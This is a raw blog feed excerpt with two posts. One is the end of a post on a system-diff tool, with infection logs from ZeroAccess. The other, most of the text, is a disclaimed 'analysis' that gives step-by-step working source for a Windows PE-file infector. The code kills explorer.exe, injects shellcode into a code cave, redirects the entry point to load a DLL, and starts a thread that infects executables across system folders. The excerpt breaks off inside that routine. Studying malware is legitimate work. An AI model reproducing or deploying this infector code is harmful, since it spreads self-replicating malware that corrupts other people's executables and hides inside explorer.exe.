&lt;a href="http://3.bp.blogspot.com/-QI2-BsBB_IQ/UE7aap-k1TI/AAAAAAAAAJI/ZAvl52BUdLE/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-QI2-BsBB_IQ/UE7aap-k1TI/AAAAAAAAAJI/ZAvl52BUdLE/s1600/Capture.PNG" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="474" src="http://3.bp.blogspot.com/-QI2-BsBB_IQ/UE7aap-k1TI/AAAAAAAAAJI/ZAvl52BUdLE/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Registry analysis&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
DiffView is also able to &lt;b&gt;log a report in text format&lt;/b&gt;, as seen below.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;DiffView 1.0.0.0 (by Tigzy)&lt;br /&gt;********************************&lt;br /&gt;&lt;br /&gt;Run : 11/09/2012 08:03:33 [Normal Mode]&lt;br /&gt;Machine : VMXP (1 CPUs) [tigzy : ADMIN]&lt;br /&gt;OS: Microsoft Windows XP Professionnel Service Pack 3 (x86)&lt;br /&gt;Diff Time: 1 mn(s)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~~ File Diff: ~~&lt;br /&gt;ROOT --&amp;gt; C:\\Documents and Settings&lt;br /&gt;ROOT --&amp;gt; C:\\RECYCLER&lt;br /&gt;ROOT --&amp;gt; C:\\WINDOWS&lt;br /&gt;&lt;br /&gt;[NEW] C:\Documents and Settings\tigzy\Bureau\DiffView.exe&lt;br /&gt;[MOD] C:\Documents and Settings\tigzy\Local Settings\Application Data\GDIPFONTCACHEV1.DAT&lt;br /&gt;[MOD] C:\Documents and Settings\tigzy\NTUSER.DAT.LOG&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\L\00000004.@&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\00000004.@&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\00000008.@&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\000000cb.@&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\80000000.@&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\80000032.@&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\@&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\n&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-21-823518204-842925246-839522115-1003\$848ec4efb4fb6501ab69678738a3a5c6\@&lt;br /&gt;[NEW] C:\RECYCLER\S-1-5-21-823518204-842925246-839522115-1003\$848ec4efb4fb6501ab69678738a3a5c6\n&lt;br /&gt;[NEW] C:\WINDOWS\assembly\GAC\Desktop.ini&lt;br /&gt;[MOD] C:\WINDOWS\system32\config\default.LOG&lt;br /&gt;[MOD] C:\WINDOWS\system32\config\software&lt;br /&gt;[MOD] C:\WINDOWS\system32\config\software.LOG&lt;br /&gt;[MOD] C:\WINDOWS\system32\config\system.LOG&lt;br /&gt;[MOD] C:\WINDOWS\system32\wbem\Logs\wbemess.log&lt;br /&gt;[MOD] C:\WINDOWS\system32\wbem\Repository\$WinMgmt.CFG&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;[QUICK SCAN]&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;~~ Reg Diff: ~~&lt;br /&gt;ROOT --&amp;gt; HKEY_CLASSES_ROOT&lt;br /&gt;ROOT --&amp;gt; HKEY_CURRENT_USER&lt;br /&gt;ROOT --&amp;gt; HKEY_LOCAL_MACHINE&lt;br /&gt;&lt;br /&gt;[KEY][MOD] HKEY_CLASSES_ROOT\clsid&lt;br /&gt;[KEY][MOD] HKEY_CLASSES_ROOT\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32&lt;br /&gt;[KEY][MOD] HKEY_CLASSES_ROOT\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}&lt;br /&gt;[KEY][MOD] HKEY_CLASSES_ROOT\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32&lt;br /&gt;[KEY][MOD] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count&lt;br /&gt;[KEY][MOD] HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache&lt;br /&gt;[KEY][MOD] HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\TaskManager&lt;br /&gt;[KEY][MOD] HKEY_CURRENT_USER\Software\Classes&lt;br /&gt;[KEY][MOD] HKEY_CURRENT_USER\Software\Classes\clsid&lt;br /&gt;[KEY][MOD] HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}&lt;br /&gt;[KEY][MOD] HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32&lt;br /&gt;[KEY][MOD] HKEY_CURRENT_USER\SessionInformation&lt;br /&gt;[KEY][MOD] HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32&lt;br /&gt;&lt;br /&gt;Finished&lt;br /&gt;&amp;lt;C:\Documents and Settings\tigzy\Bureau\DiffView[0].txt&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;[THOROUGH SCAN]&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;~~ Reg Diff: ~~&lt;br /&gt;ROOT --&amp;gt; HKEY_CLASSES_ROOT\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}&lt;br /&gt;ROOT --&amp;gt; HKEY_CLASSES_ROOT\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}&lt;br /&gt;ROOT --&amp;gt; HKEY_CURRENT_USER\Software\Classes&lt;br /&gt;ROOT --&amp;gt; HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}&lt;br /&gt;ROOT --&amp;gt; HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}&lt;br /&gt;&lt;br /&gt;[KEY][MOD] HKEY_CLASSES_ROOT\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}&lt;br /&gt;[KEY][MOD] HKEY_CLASSES_ROOT\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32&lt;br /&gt;[VAL][MOD] HKEY_CLASSES_ROOT\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32 :&amp;nbsp; (C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\n.) -&amp;gt; Olddata :&amp;nbsp; (C:\WINDOWS\system32\wbem\fastprox.dll)&lt;br /&gt;[KEY][MOD] HKEY_CLASSES_ROOT\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}&lt;br /&gt;[KEY][NEW] HKEY_CLASSES_ROOT\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32&lt;br /&gt;[KEY][MOD] HKEY_CURRENT_USER\Software\Classes&lt;br /&gt;[KEY][NEW] HKEY_CURRENT_USER\Software\Classes\clsid&lt;br /&gt;[KEY][MOD] HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}&lt;br /&gt;[KEY][MOD] HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32&lt;br /&gt;[VAL][MOD] HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32 :&amp;nbsp; (C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\n.) -&amp;gt; Olddata :&amp;nbsp; (C:\WINDOWS\system32\wbem\fastprox.dll)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: #134f5c;"&gt;
&lt;b&gt;DiffView is available for download here : &lt;a href="http://tigzy.geekstogo.com/diffview.html" style="color: #674ea7;"&gt;http://tigzy.geekstogo.com/diffview.html&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/OCbGG6rY6dk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/6377209660053494517/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/09/tool-diffview-test-on-zeroaccess.html#comment-form" title="4 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/6377209660053494517?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/6377209660053494517?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/OCbGG6rY6dk/tool-diffview-test-on-zeroaccess.html" title="[Tool] DiffView - Test on ZeroAccess" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-YEl9itk6np4/UE7abX8wrJI/AAAAAAAAAJM/C8TE40eTnvg/s72-c/Capture2.PNG" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/09/tool-diffview-test-on-zeroaccess.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkIDQH4_fyp7ImA9WhJUFE4.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-8775165972054832573</id><published>2012-09-10T08:03:00.001-07:00</published><updated>2012-09-12T01:29:31.047-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-09-12T01:29:31.047-07:00</app:edited><title>[Analysis] Chronicles of a PE Infector</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-PlnhEX853MA/UE2-ArXn6fI/AAAAAAAAAIM/F2jZVEqLTxQ/s1600/Capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;/h2&gt;
&lt;h2&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Chronicles of a PE Infector&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-2lstW-aOdOg/UE2ejGECGXI/AAAAAAAAAH4/iLdvoDx2vQE/s1600/Pr%C3%A9sentation1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;Recently while roaming on forums I came across a basic tutorial on "how to make a PE infector". It was explaining how to modify a PE (.exe or .dll) in order to execute some custom code at its startup (it was a MessageBox "Hello world"). I tried it, and indeed it was easy. So to go further I wanted to implement a true PE infector, able to replicate himself in other files ...&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: #cc0000; text-align: center;"&gt;
&lt;b&gt;DISCLAIMER!&lt;/b&gt;&lt;/div&gt;
This is not a "how to" to make a virus. This is a detailed analysis to explain how virus (and especially PE-infectors) works. You cannot use this to propagate virus. These technicals are known for years by malware editors, so this is only to help "good" people to understand how they work. I cannot be responsible for damaged caused by this code on your or someone's computer. You use it at your own risk.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Scheme of attack&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
Basically, the main idea is to redirect the PE execution flow from the entry point (EP) to an injected section of code (ShellCode). Then, the ShellCode must call the previous entry point (EP). This will allow to execute some code before the PE access its own. Here's a schematic :&lt;/div&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-2lstW-aOdOg/UE2ejGECGXI/AAAAAAAAAH4/iLdvoDx2vQE/s1600/Pr%C3%A9sentation1.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="296" src="http://4.bp.blogspot.com/-2lstW-aOdOg/UE2ejGECGXI/AAAAAAAAAH4/iLdvoDx2vQE/s640/Pr%C3%A9sentation1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Left : before patching - Right : after patching&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Infect an executable &lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;br /&gt;
Once the routine to infect a PE is done, we can schedule a macro attack over the system. To do this, we will act in 2 times. The first step is to infect an important exe file : &lt;b&gt;explorer.exe&lt;/b&gt;. As this file is protected (cause running), we will simply kill its process and infect the file. This will force the process to reload the file (infected this time) and will allow the patching.&lt;br /&gt;
&lt;br /&gt;
Here's the code of the main. We basically get the path of explorer.exe, we kill it, wait half a second (the time for the kill to be done) and we infect it.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;int _tmain(int argc, _TCHAR* argv[])
{
 TCHAR win[MAX_PATH] = L"";
 SHGetFolderPath(NULL,CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, win); //Windows
 
 wstring Path = wstring(win) + L"\\explorer.exe";
 KillProcessByName(L"explorer.exe");
 Sleep(500);
    InfectPe(Path);
 
 system("PAUSE");
    return 0;
}&lt;/pre&gt;
&lt;br /&gt;
Let's see the &lt;b&gt;InfectPE&lt;/b&gt; routine, step by step...&lt;br /&gt;
&lt;br /&gt;
In order to compile those functions at the same place as in the source code, you need to &lt;b&gt;remove the incremental linking&lt;/b&gt; from the linker options (thanks &lt;i style="color: #351c75;"&gt;&lt;b&gt;Shebaw&lt;/b&gt;&lt;/i&gt;). &lt;br /&gt;
&lt;br /&gt;
Here we simply get address and size of the &lt;b&gt;ShellCode&lt;/b&gt;. The size is get by looking at the address of a virtual function called ShellCodeEnd, which is here only to mark the end of the ShellCode (see later) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;// Get addresses of shellcode
DWORD start = (DWORD)ShellCode;
DWORD end = (DWORD)ShellCodeEnd;
DWORD stubLength = end - start; 
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;
We open the file to infect (explorer.exe) and we map its memory into our
 process context with READ and WRITE permission. Then we check if it's a
 PE (portable executable) and we save the current entry point (EP).&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;// Get addresses of shellcode
// map file
 hFile = CreateFile(Path.c_str(), GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
       
 // Get file size
 fsize = GetFileSize(hFile, 0); 
 
 // Create file mapping -- hFileMap
    hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL);
    
 // Create Map -- hMap
    hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);
     
 // check signatures -- must be a PE
    pDosHeader = (PIMAGE_DOS_HEADER)hMap;
    if(pDosHeader-&amp;gt;e_magic != IMAGE_DOS_SIGNATURE) goto cleanup;
    
    pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader-&amp;gt;e_lfanew);
    if(pNtHeaders-&amp;gt;Signature != IMAGE_NT_SIGNATURE) goto cleanup;

// Not dll
 if (pNtHeaders-&amp;gt;FileHeader.Characteristics &amp;amp; IMAGE_FILE_DLL
  &amp;amp;&amp;amp; pNtHeaders-&amp;gt;FileHeader.Characteristics &amp;amp; IMAGE_FILE_EXECUTABLE_IMAGE) goto cleanup;
 
    // get last section's header...
    pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader-&amp;gt;e_lfanew + sizeof(IMAGE_NT_HEADERS));
    pSection = pSectionHeader;
 pSection += (pNtHeaders-&amp;gt;FileHeader.NumberOfSections - 1);
    
 // save entrypoint
 oep = oepRva = pNtHeaders-&amp;gt;OptionalHeader.AddressOfEntryPoint;
    oep += (pSectionHeader-&amp;gt;PointerToRawData) - (pSectionHeader-&amp;gt;VirtualAddress); 
&lt;/pre&gt;
&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
Now we are looking for a free space to put our shellcode, based on the 
shellcode size. We just looking for a large enough place with bytes set 
to 0x0.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;// Get addresses of shellcode
//******************************************************
 // locate free space - code cave to write the shellcode 
 //******************************************************
 for(i = pSection-&amp;gt;PointerToRawData ; i != fsize ; i++)
 {
  if((char*)hMap[i] == 0x00)
  {
   if(charcounter++ == stubLength + 24)
   {
    printf("[+] Code cave located @ 0x%08lX\n", i);
    writeOffset = i;
   }
  }
  else charcounter = 0;
 }
    if(charcounter == 0 || writeOffset == 0)
 {
        printf("[-] Could not locate a big enough code cave\n");
        goto cleanup;
    }
    
 // decrement to rewind to the beg of the code cave
 writeOffset -= stubLength;
    
 // Allocate memory
    stub = (unsigned char *)malloc(stubLength + 1);
    if(!stub) goto cleanup;
    
 // copy stub into a buffer
 memcpy(stub, ShellCode, stubLength); 
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;
Then we fill the place holders of the Shellcode. By looking at the 
ShellCode's code (see below), you will see addresses initialized with &lt;b&gt;0xCCCCCCCC&lt;/b&gt;. This is a mean to quickly find the datas we need to replace.&amp;nbsp; Here we have 2 thing to replace. &lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;The address of the &lt;b&gt;LoadLibrary function&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;The initial &lt;b&gt;Entry Point&lt;/b&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;// locate offsets of place holders in code
 for(i = 0, charcounter = 0; i != stubLength; i++)
 {
        if(stub[i] == 0xCC)
  {
            charcounter++;
   if(charcounter == 4 &amp;amp;&amp;amp; callOffset == 0)   // First is call 
    callOffset = i - 3;
   else if(charcounter == 4 &amp;amp;&amp;amp; oepOffset == 0)  // Second is OEP
    oepOffset = i - 3;
  }
  else charcounter = 0;
 }
 
 // check they're valid
 if(oepOffset == 0 || callOffset == 0)
 {
  free(stub);
  goto cleanup;
 }
 
 //******************************************************
 // Load Kernel32.dll to get LoadLibrary address
 //******************************************************
 hKernel32 = LoadLibrary(L"Kernel32.dll");
 if(!hKernel32)
 {
  free(stub);
  printf("[-] Could not load Kernel32.dll");
  goto cleanup;
 }
 
 // fill in place holders
 *(u_long *)(stub + oepOffset) = (oepRva + pNtHeaders-&amp;gt;OptionalHeader.ImageBase);
 *(u_long *)(stub + callOffset) = ((DWORD)GetProcAddress(hKernel32, "LoadLibraryA"));
 FreeLibrary(hKernel32);
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;
Finally, our ShellCode is ready. We simply write it into the code cave 
we found, and we erase the original entry point with the address of the 
beginning of our ShellCode.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;// write stub
 memcpy((PBYTE)hMap + writeOffset, stub, stubLength);
 
 // rewrite entrypoint to point on shellcode
 pNtHeaders-&amp;gt;OptionalHeader.AddressOfEntryPoint = FileToVA(writeOffset, pNtHeaders) - pNtHeaders-&amp;gt;OptionalHeader.ImageBase;
 
 // set section size
 pSection-&amp;gt;Misc.VirtualSize += stubLength;
 pSection-&amp;gt;Characteristics |= IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;
 
 // cleanup
 printf("[+] Stub written!!\n[*] Cleaning up\n");
 free(stub);
 
cleanup:

 // Write memory map back
 FlushViewOfFile(hMap, 0);
    UnmapViewOfFile(hMap);
    
    SetFilePointer(hFile, fsize, NULL, FILE_BEGIN);
    SetEndOfFile(hFile);
    CloseHandle(hFileMap);
    CloseHandle(hFile);
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;
Let's see this famous ShellCode...
This a very basic trick. We call &lt;b&gt;LoadLibray&lt;/b&gt; with the complete path of our injected DLL. This DLL will contain all the code we want to execute in the process's context.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;__declspec(naked) void ShellCode()
{
 __asm
 {
  pushad       // preserve our thread context
  call GetBasePointer
  GetBasePointer: 
  pop ebp
  sub ebp, offset GetBasePointer // delta offset trick.
  
  lea  eax, [ebp+szPath]   // Path param
  push eax
  mov  eax, 0xCCCCCCCC   // pattern to fill with GetProcAddr("LoadLibrary")
  call eax
 
  popad       // restore our thread context
  push 0xCCCCCCCC     // push address of orignal entrypoint
  retn       // retn used as jmp
  
  szPath:       // C:\\windows\\system32\\pe.dll
   bb('C') bb(':') bb('\\') bb('w') bb('i') bb('n') bb('d') bb('o') bb('w') bb('s') bb('\\')
   bb('s') bb('y') bb('s') bb('t') bb('e') bb('m') bb('3') bb('2') bb('\\') bb('p') bb('e') 
   bb('.') bb('d') bb('l') bb('l') bb(0)      
 }
}
// Here to mark the end of the shellcode
__declspec(naked) void ShellCodeEnd()
{

}
&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="color: #0b5394;"&gt;
&lt;h4&gt;
&lt;i&gt;Here's what we've got at the execution :&lt;/i&gt;&lt;/h4&gt;
&lt;h4&gt;
&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-PlnhEX853MA/UE2-ArXn6fI/AAAAAAAAAIM/F2jZVEqLTxQ/s1600/Capture2.PNG" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="323" src="http://3.bp.blogspot.com/-PlnhEX853MA/UE2-ArXn6fI/AAAAAAAAAIM/F2jZVEqLTxQ/s640/Capture2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Explorer.exe patching by the infector.exe&lt;br /&gt;
&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
A code cave has been found, and explorer.exe is infected. At its startup, it will execute our ShellCode and load the &lt;b&gt;pe.dll&lt;/b&gt; library (that we copied into the good directory!)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-923CpGbkU7c/UE29__NFocI/AAAAAAAAAII/toOamx5qwsc/s1600/Capture1.PNG" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="430" src="http://3.bp.blogspot.com/-923CpGbkU7c/UE29__NFocI/AAAAAAAAAII/toOamx5qwsc/s640/Capture1.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Explorer.exe is injected with pe.dll&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;a href="http://3.bp.blogspot.com/-923CpGbkU7c/UE29__NFocI/AAAAAAAAAII/toOamx5qwsc/s1600/Capture1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Infect all executables&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
Don't stop here :). At this moment, explorer.exe is able to load our DLL at each startup. As Windows needs to start this program each time the system starts, we know our code will be executed. By the way, having a thread into explorer.exe is one of the finest thing for an attacker because inconspicuous.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
Now, we will see how this DLL can be used to infect all executables and execute some custom code (depending on what you want). See this schematic:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-9OGZep5UUVg/UE4A_iOBYFI/AAAAAAAAAI4/ACX40TRxkGA/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="472" src="http://1.bp.blogspot.com/-9OGZep5UUVg/UE4A_iOBYFI/AAAAAAAAAI4/ACX40TRxkGA/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Let's see the DLL's code. We simply Output a string at process attach (when the process loads the DLL) and we fire a new Thread to infect all PE.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
      )
{
 DWORD ret = 0;

 switch (ul_reason_for_call)
 {
  case DLL_PROCESS_ATTACH:
   OutputDebugString(L"I'm injected you know!");

   // Create Thread
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)InfectAllPe, 0, 0, &amp;amp;ret);
   break;
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
  case DLL_PROCESS_DETACH:
   break;
 }
 return TRUE;
}
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;
The thread will iterate directories to find any .exe and patch it. We start at 2 strategic root directories : &lt;b style="color: #0b5394;"&gt;windir &lt;/b&gt;and &lt;b style="color: #0b5394;"&gt;programfiles&lt;span style="color: black;"&gt;. &lt;/span&gt;&lt;/b&gt;We also create a mutex on this thread because we don't need each infected process to fire a mass infection over the system. With only one thread, it's sufficient and stealthiest.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;void InfectAllPe()
{
 HANDLE hMutex;
 TCHAR win[MAX_PATH] = L"", progs[MAX_PATH] = L"";

 // Create mutex
